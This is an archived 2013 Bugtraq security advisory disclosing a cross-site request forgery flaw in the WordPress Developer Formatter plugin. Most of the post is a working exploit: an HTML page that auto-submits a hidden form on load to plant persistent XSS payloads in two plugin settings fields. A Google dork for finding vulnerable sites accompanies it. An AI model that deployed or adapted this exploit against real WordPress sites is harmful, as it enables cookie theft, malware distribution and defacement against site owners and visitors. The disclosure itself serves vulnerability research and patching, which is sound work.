[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Wordpress Developer Formatter CSRF Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Wordpress Developer Formatter CSRF Vulnerability
From: illSecResearchGroup@xxxxxxxxx
Date: Tue, 22 Jan 2013 11:37:13 GMT

====================================================================================================================
# Exploit Title: Wordpress Developer Formatter CSRF Vulnerability
# Date: 21/01/13
# Author: Junaid Hussain -[ illSecure Research Group ] -
# Contact: illSecResearchGroup@xxxxxxxxx | Website: illSecure.com
# Software Link: http://wordpress.org/extend/plugins/devformatter/
# Tested on Wordpress Version 3.5, Should work on all versions.
# Google Dork: inurl:devformatter/devformatter.php
====================================================================================================================
[#] Vulnerable Code
Page: devinterface.php - Line: 46  
 <form method="post" 
action="options-general.php?page=devformatter/devformatter.php">
[#] no nonce given - Read: 
http://codex.wordpress.org/Function_Reference/wp_nonce_field
====================================================================================================================
// CSRF Exploit:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://[DOMAIN 
NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
<input name="usedevformat" style="display:none;" type="checkbox" checked/> 
<input name="copyclipboartext" type="text" style="display:none;" 
value="</textarea><script>alert(/xss/)</script>"  />
<input name="showtools" style="display:none;" type="checkbox" checked/> 
<textarea name="devfmtcss" rows="6" cols="60" style="display:none;"> 
          body {
  background-image: url('javascript:alert("XSS");') !important;
}
</textarea>
 </form></html>
====================================================================================================================
[#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which 
could lead to cookie stealing,
    malware distribution or even a defacememnt.
[#] Disclaimer: This exploit is for Research/Educational/Academic purposes 
only, 
                The Author of this exploit takes no responsibility for the way
                you use this exploit, you are responsible for your own actions. 
====================================================================================================================
Original: 
http://illsecure.com/code/Wordpress-DevFormatter-CSRF-Vulnerability.txt

Prev by Date: Looking for security contacts
Next by Date: SEC Consult SA-20130122-0 :: F5 BIG-IP XML External Entity Injection vulnerability
Previous by thread: Looking for security contacts
Next by thread: SEC Consult SA-20130122-0 :: F5 BIG-IP XML External Entity Injection vulnerability
Index(es):
- Date
- Thread